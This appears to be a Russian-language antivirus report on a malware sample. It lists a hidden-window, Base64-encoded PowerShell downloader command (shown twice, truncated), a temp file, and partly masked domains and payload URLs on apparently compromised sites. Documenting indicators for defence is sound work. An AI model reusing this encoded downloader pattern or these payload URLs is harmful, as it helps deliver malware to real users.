Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAG8AbwBjAFoAWAA9ACgAJwBrAEEAeAAnACsAJwBDADEAawBRACcAKQA7ACQARgAxAEIAVQBRAEQAUQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQBvAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1391950.cvr
- 'ba####onsulting.com':80
- 'bi#####itimonline.com':80
- 'au##.xyz':80
- 'al####andyork.com':80
- 'al####andyork.com':443
- 'ab####eative.com':80
- http://www.bi#####itimonline.com/wp-admin/xJYvwn/
- http://au##.xyz/wp-includes/mHc/
- http://al####andyork.com/backupsite/Tv8i/
- http://ab####eative.com/cgi-bin/6jz/
- 'al####andyork.com':443
- DNS ASK ba####onsulting.com
- DNS ASK bi#####itimonline.com
- DNS ASK au##.xyz
- DNS ASK al####andyork.com
- DNS ASK ab####eative.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAG8AbwBjAFoAWAA9ACgAJwBrAEEAeAAnACsAJwBDADEAawBRACcAKQA7ACQARgAxAEIAVQBRAEQAUQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQBvAE...' (со скрытым окном)